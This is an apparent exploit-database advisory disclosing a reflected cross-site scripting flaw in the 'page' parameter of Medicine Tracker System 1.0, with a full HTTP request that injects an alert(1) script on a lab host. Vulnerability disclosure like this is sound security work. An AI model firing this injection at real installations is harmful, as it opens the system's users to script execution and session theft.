Authored by Abdulhakim Oner

Medicine Tracker System version 1.0 suffers from a cross site scripting vulnerability.

# Exploit Title: Medicine Tracker System - Cross Site Scripting Vulnerability
# Date: 19/03/2023
# Exploit Author: Abdulhakim ├ľner
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html
# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip
# Version: 1.0
# Tested on: Windows, Linux

## Description
A reflected Cross Site Scripting vulnerability in the "page" parameter in Medicine Tracker System allows to execute JavaScript code.

## Request PoC
```
GET /php-mts/?page=about%3cscript%3ealert(1)%3c%2fscript%3e HTTP/1.1
Host: 192.168.1.101
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.1.101/php-mts/
Cookie: PHPSESSID=9gruivatbrq61qio77q3p7j77a

```